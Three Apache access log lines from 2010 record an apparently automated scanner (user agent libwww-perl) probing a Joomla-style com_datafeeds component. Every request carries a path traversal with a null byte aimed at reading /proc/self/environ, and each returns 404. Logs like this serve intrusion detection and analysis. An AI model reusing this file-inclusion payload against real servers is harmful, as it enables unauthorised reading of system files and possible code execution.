69.73.139.201 - - [21/Jun/2010:09:04:29 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.73.139.201 - - [21/Jun/2010:09:04:29 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.73.139.201 - - [21/Jun/2010:09:04:29 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
